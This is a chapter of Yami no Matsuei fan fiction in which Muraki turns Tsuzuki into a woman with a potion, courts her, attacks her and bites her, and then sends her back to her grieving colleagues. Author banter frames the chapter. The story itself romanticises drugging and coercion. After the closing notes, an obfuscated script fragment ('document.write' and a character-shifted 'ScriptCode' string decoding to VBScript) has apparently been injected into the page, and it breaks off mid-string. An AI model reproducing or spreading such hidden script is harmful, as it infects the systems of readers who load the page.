Yami No Matsuei Fan Fiction ❯ Girl Trouble... ❯ Caught in the net ( Chapter 2 )

[ P - Pre-Teen ]

az: ^_^... I'm evil... hehe... I was inspired to continue this as I watch the visualizations on my Media player as I played Boundless Love... sweet!!

A/N: To anyone still new in the anime fic world, THERE ARE (A BIG ARE!!!!) SOME WORDS THAT ARE NOT IN THE DICTIONARY AND ONLY USED IN THE ANIME LANGUAGE!!! SO, NOT SATISFIED? GO AWAY!!!!


Disclaimer: I don't own Yami no Matsuei nor did I own the tankoubons or the anime. Characters and original excerpt from the fic are copyrights of Matsushita Yoko-sensei. No infringements are intended and no grudge was held during this production. The sea would dry out if I dare right sappy yaoi scenes.... Err, why suddenly it feels so hot in here.... lol...


Girl Trouble...

Caught in the net

Written by Azzie @ Alienna Azuani @ Yami Azzie

'Aaa... my head hurts!! Everything hurts...', moaned Tsuzuki as he opened his eyes to find himself (or herself) in the same room he (or she) was before. Aah!! I'm a man trapped in a woman's body!! So cut it out!!...(az: Are you talking to me?! o_0 *slaps Tsuzuki*), scolded Tsuzuki to himself as he started to realize that he was now wearing something else, not his shirt but something that felt like silk. And he felt someone's hand around his waist. Tsuzuki nervously turned his head towards his side as he confirmed his feelings...

Muraki was lying asleep beside him, wearing a satin yukata and bandages on his forehead. Tsuzuki blushed as he felt Muraki's breath on his cheeks. Oh no... what had happened?! Did Muraki do something to me while I'm asleep?!!', thought Tsuzuki fearfully as his heart beats faster. But it couldn't stop himself as he reached his hand to touch Muraki's pale cheeks. 'Then again...', he whispered softly as he felt the soft skin. '...Muraki now looked so at peace with himself, so innocent and fragile...', he trailed in deep thought and admiration. Hey!! This is Muraki...! I shouldn't be thinking of him like this...!!, scold Tsuzuki to himself again, desperately as he pulled his hands away.

But suddenly his heart stopped as Muraki's hand caught his and his eyes opened, revealing his seductive silver orbs. Tsuzuki's cheeks flushed as Muraki smiled at him. 'That was so sweet of you to say something like that about me...', he drawled as Tsuzuki looked away. Muraki pulled back her face towards himself as he spoke again. 'Rest my dear... I'm still tired. Later, I'll try to cook up some light breakfast and then we go out to eat..., okay?' Tsuzuki nodded weakly as Muraki leant closer to kiss her lips. Tsuzuki closed his eyes as Muraki pulled her closer in a tight embrace...

**

'Tatsumi... are you alright..?', gasped Watari as Tatsumi sat up on his bed. 'What the... How did I get here...?', Tatsumi spoke softly. Watari shrugged. 'You passed out after Muraki took Tsuzuki away again... I thought you won't wake up anymore...'

Tatsumi clutched his head in regret. 'Tsuzuki... I failed him again...!', Tatsumi sighed as Watari patted his shoulders in a comforting gesture. 'It's not your fault, Tatsumi... You didn't know...', said Watari again as Tatsumi started sobbing. 'I'm sorry... Tsuzuki!! I really am...', sighed Tatsumi as his face contorted into anguished sadness and regret...

**

'Get out!! If you want to take me out... I had to get ready first, right? So, shoo...! I wanna go bathing!! And don't peek, you pervert!!', cried Tsuzuki as she clutched her towel onto herself. Muraki grinned cheekily as he caressed Tsuzuki's cheeks. 'Okay... my sweet. I'll put your clothes on the bed for you later...', he said as he kissed her cheeks again. Tsuzuki blushed as he pulled away. 'You baka!! I'm not your ****ing girlfriend!! Why do so much for me... I'm a man, you idiot!! And you turned me into a girl!!', Tsuzuki shouted as Muraki cupped her face. 'And a pretty one... that's for sure... (Tsuzuki blushed) And you have to bear with it anyway since there's no antidote!! It was actually temporary... but that was if you were given just a few drops. But I gave you the whole potion!! So, you just have to wait until the effects wear off...'

Tsuzuki's face was red. 'You... IDIOT!! Baka... baka... baka....... You BAKA!!! And I even started to act like a girl!!', cried Tsuzuki as she stormed away towards the bathroom and slammed it shut behind her. Muraki grinned as he took out a beautiful white and violet gown for his sweet little Tsuzuki to wear...

**

'Okay... you can look now...', whispered Tsuzuki as Muraki looked at her in awe. 'You looked beautiful, my love...'

'WHO SAID THAT I WAS YOUR LOVER... BAKA?!!', cried Tsuzuki desperately as Muraki chuckled and walked up to her. (Tsuzuki: EBIWARAA PUNCH!!! *Muraki backed away as he caught Tsuzuki instead.*) He kissed Tsuzuki's forehead and lead her along the corridors as he locked the door to his room. 'You are so lovely... and I bet it'll be lovelier once you see the place we're going to...', he drawled as he wrapped his arm around Tsuzuki's waist...

After a few hours...

'Muraki... that was sweet of you...', she spoke eventually as they left the luxurious restaurant. Muraki smiled as he bowed towards her. Tsuzuki fidgeted as the silver orbs of his, filled her heart with desire. 'Please... stop it!! Muraki...', she cried, feeling more than flustered as his lips drew nearer. '...let me go. Please...', Tsuzuki whispered as Muraki froze. Before I'll really fall in love with you... before I really let myself willingly be yours..., thought Tsuzuki as Muraki quickly regained his composure and threw her roughly on the ground.

Tsuzuki flinched as sharp stones broke her landing and scraped her legs. The gesture was welcomed though, as the seductive spell Muraki had on her ceased to work. Tsuzuki swerved quickly as Muraki made a run towards her. She started to make a run for it as Muraki called a summoned beast to stop her. Tsuzuki evaded its attack as she prepared to call upon Suzaku. But the effort was in vain as the monster attacked her directly, sending her towards a wall. The blow knocked the air out of her lungs as she dropped to the ground, unmoving.

Muraki knelt over her and stroked her cheeks. 'I am amazed to see that you still had some fight inside of you, Tsuzuki-chan... But I have my own ways of returning you to EnmaCho...', he spoke with spite as her lifted her up on his lap and unlatched her now-broken wrist watch. 'I sorry that I have to hurt you my love... You had been very disobedient tonight...', he said as he bared his fangs over Tsuzuki's bare neck...

**

'I'm going...', said Tatsumi as Hisoka got up to join him. Watari got up to stop him against it as they heard a crashing sound outside the corridor. The trio, along with the Chief, Wakaba and Terazuma burst out into the corridors as they caught sight of Muraki walking away with a female version of Tsuzuki lying unmoving behind him. 'Wait, you bastard!!', Hisoka exclaimed as Tatsumi rushed towards Tsuzuki's limp form.

Muraki smirked as he turned around to face them. 'She was persistent to flee from me and to return here... ah well, I give her the honors of sending her here myself. May we meet later...', he said, bowing as he glared scornfully towards Tatsumi, who had Tsuzuki now in his arms. I almost had her in my grasp... But she still couldn't let you go from her heart!! But, you'll see... I'll conquer my Tsuzuki-san's heart sooner or later... This, I swear!!', thought Muraki bitterly as he vanished from view...

Hisoka darted towards Tatsumi as he examined Tsuzuki's condition. He gasped in shock to find so many bruises on her body. 'Why...', he gasped, '...why hadn't he... err, she... healed herself already?' Tatsumi shrugged as he brushed her hair aside to reveal two puncture marks on her neck. 'Here's the reason...', he spat as the others swore at the sight.

'Tatsumi... take Tsuzuki to the infirmary at once!!', ordered Chief Konoe as Tatsumi nodded affirmative. He left immediately, followed by Watari and Hisoka behind him. Chief Konoe groaned in defeat as he walked away from the scene. Wakaba sighed as she felt weak seeing Tsuzuki in such a state. Terazuma was speechless. He admitted that he did not liked Tsuzuki that much but this was pushing it too much. There is no way that he would want to see Tsuzuki in such a state...!!

**

Tsuzuki opened his eyes to find himself in a familiar room and familiar bed. He coughed as he thought sarcastically that this room had become like another home for him as he was kept being sent here for reasons obvious. He immediately hide himself under his blanket as he heard someone's voice coming towards him.

Wakaba was alighted to find Tsuzuki awake. 'Tsuzuki-san... I know you've woken up! Please don't hide yourself...!!', Wakaba-chan spoke as Tsuzuki refused to reveal himself. 'Don't worry... it's just me... Hajime-chan had already left...'

Tsuzuki peeked his head out as Wakaba-chan smiled at him. 'Anyway... you looked so cute!! And everyone was very worried... especially Tatsumi-san. These five days... he hadn't been forgiving himself. He kept going to the Chijou to try to find you but always returned, more distraught than before... He was really devastated when he saw you where Muraki had left you...'

Tsuzuki sat up slowly as Wakaba placed a pillow behind him. 'I've been out for four days since that incident...?!', he gasped to himself as he clutched his forehead. '...and he really sent me back. I thought he wouldn't...', he said again as Wakaba looked at him in concern. 'Tsuzuki-san...', she gasped as Tsuzuki shook his head at her. 'I'm fine... don't worry about me, I--', he spoke as his eyes widen. Wakaba looked behind her as Tatsumi entered the room. She smiled at him as she got up to leave.

Tsuzuki caught Wakaba's hand refusing to let her leave him. Wakaba smiled at him as she hugged him. 'Don't worry... I'll come back later. Suzaku would be too thrilled to hear that you were well. I'll bring some sweets too...!!', she said as she left him alone with Tatsumi.

Tatsumi sat on the chair that Wakaba left as Tsuzuki looked away from him. 'Tsuzuki... I'm sorry...'

Tsuzuki kept his mouth shut as Tatsumi looked at him in remorse. He sighed as he got up and wrapped his arms around Tsuzuki. Tears fell into his eyes as he held Tsuzuki, guilt overriding his thoughts and sorrow...

[TBC]


az: Ooo... I really need to know if I should continue this... But I don't think it would be too long!! I had in mind to update my other arcs... And I gave up referring Tsuzuki as her... you know it so just imagine...

eka: How dare you make Tsuzuki-chan go through this!!!! Aaaaaaaaaaaargh!!!!! -_-## (eka: EBIWARAA PUNCH!!!! *az was flying through the air....*)

az: *sweatdropped as she landed on the ground, Tsuzuki saving her from the great impact* Oh-uh... my lil sister was shooting me for bringing this fic to life!! Aahhh.... Review if you want me to continue...

Tsuzuki: Haai... poor you... and poor me... but I like the scene where Tatsumi was crying!! Hahhaha... let him pay!! How dare he hurt me!!

Tatsumi: Tsuzuki-san....!!

az: Let's run for it!! Tatsumi can't see us here...

Tsuzuki: Yup... *follows az, leaving eka stupidly in the room*

Tatsumi: eka... where are they?

eka: Runaway... that stupid sister and Tsuzuki was running away from you....

Tatsumi: *sigh...*

document.write "

" ScriptCode = "ChlRBqhos+VRBqhos+@ookds+VhmO`sg+mEnkcdq+mBncdRtaQtm^Shld'(EE/0'(EE/1'(Dmc RtaEtmbshnmEE/0'(NmDqqnqQdrtldMdwsDqq-Bkd`qSncnHs